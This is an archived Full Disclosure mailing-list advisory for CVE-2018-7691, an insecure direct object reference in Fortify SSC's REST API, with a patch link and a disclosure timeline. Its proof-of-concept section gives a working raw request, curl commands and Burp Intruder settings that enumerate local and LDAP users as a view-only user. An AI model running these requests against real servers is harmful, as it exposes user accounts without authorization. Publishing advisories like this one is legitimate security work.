<!--X-Body-Begin-->
<!--X-User-Header-->
<a href="/fulldisclosure/"><img src="/images/fulldisclosure-logo.png" class="l-logo right" alt="fulldisclosure logo" width="80"></a>
<h2 class="m-list"><a href="/fulldisclosure/">Full Disclosure</a>
mailing list archives</h2>
<!--X-User-Header-End-->
<!--X-TopPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="26"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#27">By Date</a>
<a href="28"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="26"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#27">By Thread</a>
<a href="28"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<form class="nst-search center" action="/search/fulldisclosure">
<input class="nst-search-q" name="q" type="search" placeholder="List Archive Search">
<button class="nst-search-button" title="Search">
<img style="width:100%;aspect-ratio:1/1;" alt="" aria-hidden="true" src="/shared/images/nst-icons.svg#search">
</button>
</form>
</div>
<!--X-TopPNI-End-->
<!--X-MsgBody-->
<!--X-Subject-Header-Begin-->
<h1 class="m-title">CVE-2018-7691 | The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities</h1>
<hr>
<!--X-Subject-Header-End-->
<!--X-Head-of-Message-->
<em>From</em>: alt3kx via Fulldisclosure <fulldisclosure () seclists org>
<em>Date</em>: Fri, 14 Dec 2018 10:28:40 +0000
<!--X-Head-of-Message-End-->
<!--X-Head-Body-Sep-Begin-->
<hr>
<!--X-Head-Body-Sep-End-->
<!--X-Body-of-Message-->
<pre style="margin: 0em;">Details
================
Software: Fortify SSC (Software Security Center)
Version: 17.10, 17.20 & 18.10
Homepage: [<a rel="nofollow" href="https://www.microfocus.com">https://www.microfocus.com</a>](<a rel="nofollow" href="https://www.microfocus.com/">https://www.microfocus.com/</a>)
Advisory report: <a rel="nofollow" href="https://github.com/alt3kx/CVE-2018-7691">https://github.com/alt3kx/CVE-2018-7691</a>
CVE: CVE-2018-7691 at <a rel="nofollow" href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7691">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7691</a>
CVSS: 6.5 (Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)
CWE-639
Description
================
REST API contains Insecure direct object references (IDOR) allowing and extracting arbitrary details of the Local and
LDAP users via POST method
Vulnerability
================
Fortify SSC (Software Security Center) 17.10, does not properly check ownership of "authEntities", which allows remote
authenticated (view-only) users
to read arbitrary details via API bulk parameter to /api/v1/projectVersions/{NUMBER}/authEntities
Note: View-only Role, is a restricted role, can view results, but cannot interfere with the issue triage or the
remediation process.
Proof of concept
================
Pre-requisites:
- Curl command deployed (Windows or Linux)
- jq command deployed (for parsing JSON fields), (Windows or Linux)
- Burpsuite Free/Por deployed or any other Proxy to catch/send the request (optional)
Step (1): LogOn into fortifyserver.com SSC (Software Security Center) 17.10 with your view-only role (restricted),
The URL normally is avaiable as following:
Target: <a rel="nofollow" href="https://fortifyserver.com/ssc/#/">https://fortifyserver.com/ssc/#/</a>
Step (2): Once logged extract the Cookie field, the format normally as following: "Cookie:
JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
Step (3): Start BurpSuite Free/Pro or any other HTTP proxy (optional) listen port 8080 as default
Step (4): The offending POST is:
POST /ssc/api/v1/bulk HTTP/1.1
Host: fortifyserver.com
Connection: close
Accept: application/json, text/plain, */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;
Content-Length: 123
{"requests":[{"uri":"[<a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}\x0d\x0a">https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities","httpVerb":"GET"}]}\x0d\x0a</a>](<a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities%22,%22httpVerb%22:%22GET%22%7D]%7D/x0d/x0a">https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities%22,%22httpVerb%22:%22GET%22%7D]%7D/x0d/x0a</a>)
Step (5): Test the first POST (to be included the cookie session) request and parsing the JSON data received using curl
and jq commands as following:
# curl -s -k -X POST <a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/bulk">https://fortifyserver.com/ssc/api/v1/bulk</a>
-H "Host: fortifyserver.com"
-H "Connection: close"
-H "Accept: application/json, text/plain, */*"
-H "X-Requested-With: XMLHttpRequest"
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89
Safari/537.36"
-H "Content-Type: application/json;charset=UTF-8"
-H "Accept-Encoding: gzip, deflate"
-H "Accept-Language: en-US,en;q=0.9"
-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
--data-binary
"{\"requests\":[{\"uri\":\"[<a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a">https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a</a>](<a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities/%22,/%22httpVerb/%22:/%22GET/%22%7D]%7D/x0d/x0a">https://fortifyserver.com/ssc/api/v1/projectVersions/0/authEntities/%22,/%22httpVerb/%22:/%22GET/%22%7D]%7D/x0d/x0a</a>)"
--proxy [<a rel="nofollow" href="http://127.0.0.1:8080">http://127.0.0.1:8080</a>](<a rel="nofollow" href="http://127.0.0.1:8080/">http://127.0.0.1:8080/</a>) | jq '.data[] .responses[] .body .responseCode'
You should see the following response:
200
Step (6): Now extract all local and LDAP users registered into Fortify SSC server:
Payload: /api/v1/projectVersions/{NUMBER}/authEntities, see the field "--data-binary" below and change the number as
following:
# curl -s -k -X POST <a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/bulk">https://fortifyserver.com/ssc/api/v1/bulk</a>
-H "Host: fortifyserver.com"
-H "Connection: close"
-H "Accept: application/json, text/plain, */*"
-H "X-Requested-With: XMLHttpRequest"
-H "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89
Safari/537.36"
-H "Content-Type: application/json;charset=UTF-8"
-H "Accept-Encoding: gzip, deflate"
-H "Accept-Language: en-US,en;q=0.9"
-H "Cookie: JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
-b "JSESSIONID=69B1DBD72FCA8DB57C08B01655A07414;"
--data-binary
"{\"requests\":[{\"uri\":\"[<a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a">https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities\",\"httpVerb\":\"GET\"}]}\x0d\x0a</a>](<a rel="nofollow" href="https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities/%22,/%22httpVerb/%22:/%22GET/%22%7D]%7D/x0d/x0a">https://fortifyserver.com/ssc/api/v1/projectVersions/3/authEntities/%22,/%22httpVerb/%22:/%22GET/%22%7D]%7D/x0d/x0a</a>)"
--proxy [<a rel="nofollow" href="http://127.0.0.1:8080">http://127.0.0.1:8080</a>](<a rel="nofollow" href="http://127.0.0.1:8080/">http://127.0.0.1:8080/</a>) | jq '.data[] .responses[] .body .data[] .entityName'
You should see the following response with users available
"admin"
"sca"
"alex"
[../snip]
Step (7): Automate with BurpSuite Pro/Free choose:
Payload Positions: "Intruder Tab -> Positions" highlight as following:
-> /api/v1/projectVersions/§1§/authEntities
Payloads set: "Intruder Tab -> Payloads" with the following data:
-> Payload set: 1
-> Payload type: Numbers
Payload Options [Numbers]:
-> Type: Sequential
-> From: 0
-> To: 1500
-> Step: 1
Then start attack…
Have fun!
Have fun!
Mitigations
================
Install the latest patches availabe here:
<a rel="nofollow" href="https://softwaresupport.softwaregrp.com/doc/KM03298201">https://softwaresupport.softwaregrp.com/doc/KM03298201</a>
Disclosure policy
================
We believes in responsible disclosure.
Please contact us on Alex Hernandez aka alt3kx (at) protonmail com to acknowledge this report.
This vulnerability will be published if we do not receive a response to this report with 10 days.
Timeline
================
2018-05-24: Discovered
2018-05-25: Retest PRO environment
2018-05-31: Vendor notification, two issues found
2018-05-31: Vendor feedback received
2018-06-01: Internal communication
2018-06-01: Vendor feedback, two issues are confirmed
2018-06-05: Vendor notification, new issue found
2018-06-06: Vendor feedback, evaluating High submission
2018-06-08: Vendor feedback, High issue is confirmed
2018-06-19: Researcher, reminder sent
2018-06-22: Vendor feedback, summary of CVEs handled as official way
2018-06-26: Vendor feedback, official Hotfix for High issue available to test
2018-06-29: Researcher feedback
2018-07-02: Researcher feedback
2018-07-04: Researcher feedback, Hotfix tested on QA environment
2018-07-05: Vendor feedback, fixes scheduled Aug/Sep 2018
2018-08-02: Reminder to vendor, feedback received OK!
2018-09-26: Reminder to vendor, feedback received OK!
2018-09-26: Fixes received from the vendor
2018-10-02: Internal QA environment failed, re-building researcher 's ecosystem
2018-10-11: Internal QA environment failed, re-building researcher 's ecosystem
2018-10-11: Feedback from the vendor, technical details provided to the researcher
2018-10-16: Fixes now tested on QA environment
2018-11-08: Reminder received from the vendor, feedback provided by researcher
2018-11-09: Re-rest fixes on QA environment
2018-11-15: Re-rest fixes on QA environment now with SSC 18.20 version deployed
2018-11-21: Researcher feedback
2018-11-23: Fixes working well/confirmed by researcher
2018-11-23: Vendor feedback, final details to disclosure the CVE and official fixes available for customers.
2018-11-26: Vendor feedback, CVE, and official fixes to be disclosure
2018-11-26: Agreements with the vendor to publish the CVE/Advisory.
2018-12-12: Public report
Discovered by:
Alex Hernandez aka alt3kx:
================
Please visit <a rel="nofollow" href="https://github.com/alt3kx">https://github.com/alt3kx</a> for more information.
My current exploit list @exploit-db:
<a rel="nofollow" href="https://www.exploit-db.com/author/?a=1074">https://www.exploit-db.com/author/?a=1074</a> & <a rel="nofollow" href="https://www.exploit-db.com/author/?a=9576">https://www.exploit-db.com/author/?a=9576</a>
_______________________________________________
Sent through the Full Disclosure mailing list
<a rel="nofollow" href="https://nmap.org/mailman/listinfo/fulldisclosure">https://nmap.org/mailman/listinfo/fulldisclosure</a>
Web Archives & RSS: <a rel="nofollow" href="http://seclists.org/fulldisclosure/">http://seclists.org/fulldisclosure/</a></pre>
<!--X-Body-of-Message-End-->
<!--X-MsgBody-End-->
<!--X-Follow-Ups-->
<hr>
<!--X-Follow-Ups-End-->
<!--X-References-->
<!--X-References-End-->
<!--X-BotPNI-->
<div class="nav-bar">
<div class="nav-link">
<a href="26"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="date.html#27">By Date</a>
<a href="28"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
<div class="nav-link">
<a href="26"><img src="/images/left-icon-16x16.png" alt="Previous" width="16" height="16"></a>
<a href="index.html#27">By Thread</a>
<a href="28"><img src="/images/right-icon-16x16.png" alt="Next" width="16" height="16"></a>
</div>
</div>
<h3 class="m-thread">Current thread:</h3>
<ul class="thread">
<li><strong>CVE-2018-7691 | The SSC REST API contains Insecure Direct Object Reference (IDOR) vulnerabilities</strong> <em>alt3kx via Fulldisclosure (Dec 14)</em>
</li></ul>
<!--X-BotPNI-End-->
<!--X-User-Footer-->
<!--X-User-Footer-End-->
<p>
Vulmon